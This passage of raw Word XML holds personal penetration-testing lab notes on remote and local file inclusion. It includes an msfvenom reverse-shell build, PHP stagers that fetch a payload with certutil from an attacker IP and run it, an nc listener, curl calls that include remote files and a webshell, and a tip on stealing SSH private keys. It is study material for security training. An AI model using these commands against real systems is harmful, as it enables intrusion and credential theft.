    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;YOUR tun0 IP&gt; LPORT=135 -f exe &gt; rev.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we need to create two PHP files that we will be able to execute via curl (thanks to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting spotted in phpinfo). We can call them step1.php and step2.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1.php (Be sure to use your tun0 IP address not mine seen below)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('certutil.exe -urlcache -split -f "http://192.168.45.195/rev.exe" rev.exe', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('rev.exe', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener and make sure the 2 steps and rev shell in same directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="553" name="image535.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image535.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55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1C2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally we will start curling the two PHP files. This will both retrieve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute our PHP files. (Your IP addresses will be different)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i http://192.168.212.53:4443/site/index.php?page=http://192.168.45.195/step1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="150" name="image187.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image187.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId556"/>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1C32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, curl step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i http://192.168.212.53:4443/site/index.php?page=http://192.168.45.195/step2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="375" name="image370.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image370.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId557"/>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1C35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It should hang</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check python host to make sure it got both steps and rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1244600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="327" name="image335.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image335.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId558"/>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1C38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then check listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3B">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C3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 9.2.3. Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it's pretty minimal. It's just LFI but you can access like a python host on your local Kali. And it's often not able to be used since you need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled in order to do it on PHP site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "http://mountaindesserts.com/meteor/index.php?page=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.119.3/simple-backdoor.php&amp;cmd=ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This accessed a backdoor (webshell) that was hosted by python server on Kali, and then ran "ls" on it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C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46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_758l5jdwkfiq" w:id="233"/>
      <w:bookmarkEnd w:id="233"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C49">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When doing LFI, and doing stuff like stealing SSH private keys, it's not a bad idea to use CURL since it most likely formats the private key (and other) output better than the website does</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One big example of LFI was in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on machine 192.168.xxx.245</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This LFI came from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache httpd 2.4.49 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI exploit, where we had to use special encoding to get past the security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
